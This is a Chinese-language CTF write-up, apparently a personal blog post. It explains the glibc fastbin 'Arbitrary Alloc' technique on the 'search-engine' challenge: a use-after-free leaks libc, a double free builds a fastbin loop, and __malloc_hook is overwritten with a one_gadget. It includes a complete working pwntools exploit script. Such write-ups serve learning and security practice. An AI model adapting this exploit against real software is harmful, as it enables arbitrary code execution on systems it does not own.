Arbitrary Alloc

18 February 2020 - 13 mins read time
Tags: HeapExploit pwn

Arbitrary Alloc

这种利用方式就是在目标位置伪造一个chunk，然后overwrite当前fastbin中chunk的fd指针，指向该chunk，进而实现任意写。这种漏洞往往伴随着double free，我们可以通过构造循环链表来控制fd指针。其中，最重要的步骤就是构造fake_chunk的size字段，通常我们可能会覆盖__malloc_hook，于是在其周围伪造fastbin时往往需要错位来满足size，这里可以手算，我比较习惯用find_fake_fast <addr> size来快速查找合适的位置:

pwndbg> print (void*)&__malloc_hook   
$1 = (void *) 0x7f67160bab10 <__malloc_hook>
pwndbg> find_fake_fast 0x7f67160bab10 0x7f
FAKE CHUNKS
0x7f67160baaed FAKE PREV_INUSE IS_MMAPED NON_MAIN_ARENA {
  prev_size = 7428137358697955328, 
  size = 127,       <-  size
  fd = 0x6715d7be20000000, 
  bk = 0x6715d7ba0000007f, 
  fd_nextsize = 0x7f, 
  bk_nextsize = 0x0
}
pwndbg> 

下面我们来看一道题。

search-engine

这道题是我目前做过的最复杂的题目，当然攻克之后学到了很多东西，一道题目能牵扯到这么多利用点也是很棒了。但是在刚开始分析算法的时候我基本没看懂咋回事…

首先这个东西的功能就是可以输入一个句子，然后他把句子用空格拆成单词然后存起来。我们来看一波关键函数：

add_sentence()

这个大概算法就是输入一个句子，然后存起来，然后把这个句子用空格分割成单词，然后每个单词建立一个word结构体，word的头存在word_head这个位置。

int add_sentence() {
    ......
  puts("Enter the sentence size:");
  size = read_number();
  v1 = (unsigned int)(size - 1);
  size1 = size;
  if ( (unsigned int)v1 > 0xFFFD )
    throw_err("Invalid size");
  puts("Enter the sentence:");
  sentence = (char *)malloc(size1);
  read_by_byte((__int64)sentence, size1, 0);
  v4 = (signed __int64)(sentence + 1);
  v5 = (signed __int64)&sentence[v1 + 2];
  word = (Word *)malloc(0x28uLL);
  v7 = 0;
  word->word_ptr = (__int64)sentence;
  word->word_size = 0;
  word->sentence_ptr = (__int64)sentence;
  word->sentence_size = size1;
  do {
    while ( *(_BYTE *)(v4 - 1) != ' ' ) {
      word->word_size = ++v7;
LABEL_4:
      if ( ++v4 == v5 )
        goto LABEL_8;
    }
    if ( v7 ) {
      v10 = word_head;
      word_head = (__int64)word;
      word->prev = v10;
      word = (Word *)malloc(0x28uLL);
      v7 = 0;
      word->word_ptr = v4;
      word->word_size = 0;
      word->sentence_ptr = (__int64)sentence;
      word->sentence_size = size1;
      goto LABEL_4;
    }
    word->word_ptr = v4++;
  }
  while ( v4 != v5 );
LABEL_8:
  if ( v7 ) {
    v8 = word_head;
    word_head = (__int64)word;
    word->prev = v8;
  }
  else {
    free(word);
  }
  return puts("Added sentence");
}

经过分析，word结构体的内存分布应该是：

00000000 Word            struc ; (sizeof=0x28, mappedto_6)
00000000 word_ptr        dq ?                    
00000008 word_size       dd ?                    
0000000C padding1        dd ?
00000010 sentence_ptr    dq ?
00000018 sentence_size   dd ?
0000001C padding2        dd ?
00000020 prev            dq ?
00000028 Word            ends

用代码还原一下就是：

struct Word {
    char* word_ptr;
    int word_size;
    char* sentence_ptr;
    int sentence_size;
    Word* prev;
};

search()

这个函数的大概算法就是从word_head开始便利word链表，然后查找对应的单词。其主要的判断逻辑在v2->word_size == size && !memcmp(v2->word_ptr,v1,size)这里，就是说单词的size要和结构体中的size相等，然后单词的内容也要相等。
接下来我们可以看到当查找到对应的句子时，会打印出对应的句子，然后问你是不是要free掉sentence。如果你free了，这个sentence的内容会被设置成\x00。但是我们注意到，sentence被free后，sentence_ptr没有被设成null，因此这里可以使用uaf漏洞泄漏unsorted-bin的地址。另外该word也没有从链表中移除，所以每次搜索还是要便利到。这时我们可以输入\x00来绕过memcmp()的检测，那怎么绕过前面的size比较呢？
假如我们构造’aaa b’这种句子，那么 ‘b’ 这个单词size就是1，然后free之后b被设置成了\x00，于是便可以绕过整个判断。

void search()
{
    ......
  puts("Enter the word size:");
  size = read_number();
  if ( (unsigned int)(size - 1) > 0xFFFD )
    throw_err("Invalid size");
  puts("Enter the word:");
  v1 = malloc(size);
  read_by_byte((__int64)v1, size, 0);
  v2 = (Word *)word_head;
  if ( word_head ) {
    do {
      if ( *(_BYTE *)v2->sentence_ptr ) {
        if ( v2->word_size == size && !memcmp((const void *)v2->word_ptr, v1, size) ) {
          __printf_chk(1LL, "Found %d: ", (unsigned int)v2->sentence_size);
          fwrite((const void *)v2->sentence_ptr, 1uLL, v2->sentence_size, stdout);
          putchar(10);
          puts("Delete this sentence (y/n)?");
          read_by_byte((__int64)&v3, 2, 1);
          if ( v3 == 'y' ) {
            memset((void *)v2->sentence_ptr, 0, v2->sentence_size);
            free((void *)v2->sentence_ptr);
            puts("Deleted!");
          }
        }
      }
      v2 = (Word *)v2->prev;
    }
    while ( v2 );
  }
  free(v1);
}

于是我们的大概思路就是：

利用uaf，使用unsorted-bin泄漏libc的地址
使用double free构造fastbin循环链表，overwrite其fd指针为fake_chunk
在fake_chunk中覆盖__malloc_hook为one_gadget

看起来很简单…其实一言难进。

leak libc

首先我们要做的就是想办法泄漏出libc的地址，本题采用的泄漏unsorted-bin的地址的方式我也是第一次见到，有亿些细节很讲究，大致流程如下：

首先分配一个small-bin，然后free掉，它进入unsorted-bin
此时他构成一个双向链表，我们通过puts_sentence来打印其fd指针，这里的fd指针就是unsorted-bin-addr
根据unsorted-bin-addr来计算main_arena的地址，这里要对着源码进行计算…十分繁琐
去libc.so中查找main_arena的偏移地址main_arena_libc
libc的偏移offset = main_arena - main_arena_libc

好的这个泄漏unsorted-bin的函数是这样的：

def leak_bins():
    contain = 'a'*0x85 + ' ' + 'b'
    add_sentence(contain)
    search('b')
    sh.recvuntil("Delete this sentence (y/n)?")
    sh.sendline('y')
    search('\x00')
    sh.recvuntil("Found 135: ")
    unsorted_bin = u64(sh.recv(8))
    sh.recvuntil("Delete this sentence (y/n)?")
    sh.sendline('n')
    return unsorted_bin

这个时候我们就拿到了unsorted-bin的地址，然后就是计算main_arena的地址了，这里需要对照源码，我先给出我的函数：

def main_arena_offset(index):
    offset = 4          # lock
    offset += 4         # flag
    offset += 8 * 10    # fastbins
    offset += 8 + 8     # top and lastremainder
    offset += 8 * index # bins[NBINS * 2 -2]
    offset -= 8 * 2     # offset to chunk head
    return offset

至于原因是为啥，我们得看malloc_state结构体和：

struct malloc_state
{
  /* Serialize access.  */
  __libc_lock_define (, mutex);

  /* Flags (formerly in max_fast).  */
  int flags;

  /* Set if the fastbin chunks contain recently inserted free blocks.  */
  /* Note this is a bool but not all targets support atomics on booleans.  */
  // 这个是新加的, 所以不用管
  int have_fastchunks;

  /* Fastbins */
  mfastbinptr fastbinsY[NFASTBINS];

  /* Base of the topmost chunk -- not otherwise kept in a bin */
  mchunkptr top;

  /* The remainder from the most recent split of a small request */
  mchunkptr last_remainder;

  /* Normal bins packed as described above */
  mchunkptr bins[NBINS * 2 - 2];

前面几个字段应该比较好理解主要是最后两行：

offset += 8 * index # bins[NBINS * 2 -2]
offset -= 8 * 2     # offset to chunk head

这个其实要看bins[NBINS*2-2]的分布，这个数组是个chunk指针数组，其本身也被当作chunk来用，malloc.c中计算bins索引的函数是这样的：

#define bin_at(m, i) \
  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))	     \
        - offsetof (struct malloc_chunk, fd))
  
#define NBINS             128

#define unsorted_chunks(M)          (bin_at (M, 1))

除了第一个 bin（unsorted bin）外，后面的每个 bin 会共享前面的 bin 的字段，将其视为 malloc chunk 部分的 prev_size 和 size。这里也说明了一个问题，bin 的下标和我们所说的第几个 bin 并不是一致的。同时，bin 表头的 chunk 的 prev_size 与 size 字段不能随便修改，因为这两个字段是被其它 bin 所利用的。所以其实unsorted-bin就是bins[0]，这里写这个函数其实是为了以后复用，泄漏smallbin啥的也有可能。

接下来就是求offset：

unsorted_bin = leak_bins()
main_arena_addr = unsorted_bin - main_arena_offset(0)
offset = main_arena_addr - main_arena_libc

至于这个main_arena_libc是怎么弄出来的，其实就是用ida去libc.so里查malloc_trim这个函数，然后第一个if语句里就有，源码里是这样写的：

int
__malloc_trim (size_t s)
{
  int result = 0;

  if (__malloc_initialized < 0)
    ptmalloc_init ();

  mstate ar_ptr = &main_arena;
.......

也是很烦琐的步骤。到这里，第一大步已经完成，接下来就是构造循环链表覆写__malloc_hook。

double free

接下来我们就考虑使用double free来构造循环链表，首先我们先构造三个句子分别形如：

# size = 0x60
aaaaa...a d 
bbbbb...b d
ccccc...c d

其长度为0x60的原因是为了满足fake_chunk的size，因为malloc_hook附近合适fastbin-size的字节几乎只有0x7f，我们一算(0x7f>>4)-2 = 5，所以0x60加上header后等于0x70就行了。
接下来我们search一下 “d” 然后把这三个都free掉，此时fastbin的link为a->b->c，接着我们需要重新free掉c或者b，因为a是链表尾，会被检测出double free。但是free的时候，此时c的fd指针为null，因此在if ( *(_BYTE *)v2->sentence_ptr )这一步判断的时候过不了，所以我们只能free掉b，那么此时的链表为：b->a->b->c，接下来我们重新malloc出b，然后将其fd指针修改为fake_chunk，则link为a->b->fake_chunk，接下来我们再malloc两次把a和b拿出来，就可以malloc获得fake_chunk了,所以完整的exp代码如下：

#!/usr/bin/env python
from pwn import *

sh = process("./search")
elf = ELF("./search")
libc = ELF("./libc.so.6")
context.terminal = ['tmux']
context.binary = 'search'
context.log_level = 'debug'
main_arena_libc = 0x3c4b20
log.info("main_arena_libc -> " + hex(main_arena_libc))

def add_sentence(sentence):
    sh.sendline('2')
    sh.recvuntil("Enter the sentence size:")
    sh.sendline(str(len(sentence)))
    sh.recvuntil("Enter the sentence:")
    sh.sendline(str(sentence))


def search(word):
    sh.sendline("1")
    sh.recvuntil("Enter the word size:")
    sh.sendline(str(len(word)))
    sh.recvuntil("Enter the word:")
    sh.sendline(str(word))

def leak_bins():
    contain = 'a'*0x85 + ' ' + 'b'
    add_sentence(contain)
    search('b')
    sh.recvuntil("Delete this sentence (y/n)?")
    sh.sendline('y')
    search('\x00')
    sh.recvuntil("Found 135: ")
    unsorted_bin = u64(sh.recv(8))
    log.info("unsorted_bin -> " + hex(unsorted_bin))
    sh.recvuntil("Delete this sentence (y/n)?")
    sh.sendline('n')
    return unsorted_bin

def main_arena_offset(index):
    offset = 4          # lock
    offset += 4         # flag
    offset += 8 * 10    # fastbins
    offset += 8 + 8     # top and lastremainder
    offset += 8 * index # bins[NBINS * 2 -2]
    offset -= 8 * 2     # offset to chunk head
    return offset

if __name__ == "__main__":
    unsorted_bin = leak_bins()
    main_arena_addr = unsorted_bin - main_arena_offset(0)
    log.info("main_arena_addr -> " + hex(main_arena_addr))
    offset = main_arena_addr - main_arena_libc
    
    one_gadget = 0xf1147 + offset
    log.info("one_gadget -> " + hex(one_gadget))

    # double free
    # malloc 3 fastbins c->b->a
    add_sentence("a"*0x5e + ' d')   # a 0x60
    add_sentence("b"*0x5e + ' d')   # b 0x60
    add_sentence("c"*0x5e + ' d')   # c 0x60

    # free all, now fastbins links a->b->c
    search("d")
    sh.recvuntil("Delete this sentence (y/n)?")
    sh.sendline('y')
    sh.recvuntil("Delete this sentence (y/n)?")
    sh.sendline('y')
    sh.recvuntil("Delete this sentence (y/n)?")
    sh.sendline('y')

    # free b, b->a->b
    search('\x00')
    sh.recvuntil("Delete this sentence (y/n)?")
    sh.sendline('y')
    sh.recvuntil("Delete this sentence (y/n)?")
    sh.sendline('n')
    sh.recvuntil("Delete this sentence (y/n)?")
    sh.sendline('n')

    fake_chunk = main_arena_addr - 0x33
    fake_chunk = p64(fake_chunk).ljust(0x60, 'x')
    add_sentence(fake_chunk)

    add_sentence('a'*0x60)
    add_sentence('b'*0x60)

    payload = 'a' * 0x13 + p64(one_gadget)
    payload = payload.ljust(0x60,'x')
    # gdb.attach(sh)
    add_sentence(payload)

    sh.interactive()

总结

这个题目很复杂，我们主要用到了uaf，double free，实现了任意写的效果，最后通过覆写malloc_hook来getshell，里面的一些细节需要注意，比如如何根据unsorted-bin计算main_arena进而获得offset。还有循环链表的构造方式，感觉除了刷题很难有手感。
总之今天学到了很多知识。

阅读量